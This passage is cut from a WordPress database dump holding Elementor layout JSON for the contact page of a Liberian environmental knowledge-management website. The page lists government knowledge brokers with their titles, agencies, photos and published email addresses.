:33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8ed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23980,3513,'_elementor_edit_mode','builder'),(23981,3513,'_elementor_template_type','wp-page'),(23982,3513,'_elementor_version','3.0.16'),(23983,3513,'_wp_page_template','default'),(23984,3513,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br 